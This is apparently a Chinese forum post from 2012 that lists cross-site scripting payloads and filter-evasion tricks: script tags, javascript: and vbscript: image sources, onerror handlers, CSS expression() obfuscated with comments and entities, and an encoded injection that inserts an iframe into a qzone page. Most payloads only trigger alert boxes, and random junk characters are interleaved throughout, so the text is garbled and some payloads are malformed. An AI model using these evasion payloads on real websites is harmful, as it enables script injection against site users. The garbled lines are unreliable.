<script>alert("跨站")</script> (最常用)
% e5 c# D( P ^6 W6 Y# V$ B9 p O<img scr=javascript:alert("跨站")></img>. M; M/ z, p6 h$ s' E: K
<img scr="javascript: alert(/跨站/)></img>8 ]& S( I6 T! g/ J& \1 N' I$ n4 q- M
<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)
% X. s3 P% d- A% `2 k$ J1 h) v<img scr="#" onerror=alert(/跨站/)></img>
5 p6 n( Q. e; y( H7 K* Z<img scr="#" style="xss:expression(alert(/xss/));"></img>! f4 Y2 L0 Y' z: A+ ?
<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)* p$ m4 ^5 j+ j' n4 v
<img src=vbscript:msgbox ("xss")></img>9 U! l" t9 X& \) y; ?0 }4 s
<style> input {left:expression (alert('xss'))}</style>8 _$ ~- b7 e, ^, w1 ^6 |
<div style={left:expression (alert('xss'))}></div>, `3 ~9 h- @9 _" O0 @
<div style={left:exp/* */ression (alert('xss'))}></div>
0 w$ i+ g6 g3 r/ h; c, P+ i<div style={left:\0065\0078ression (alert('xss'))}></div>2 k' h! U: o, y V
html 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>
4 W) t6 D* r8 d& ^7 G1 {" s0 G6 u1 j0 Qunicode <div style="{left:expRessioN (alert('xss'))}">4 ]( e8 t" d* o) T
1 `) L4 ~ B* m8 i0 @; U- J a
"]}%3Cscript%3Ealert('By b14ckb0y')%3C/script%3E{[&item="]<iframe%20src=http://new.qzone.qq.com/9530772%20width=400%20height=600></iframe>["
b$ l0 f. r4 b5 | |
发表于 2012-9-13 17:15:04
收藏
支持
反对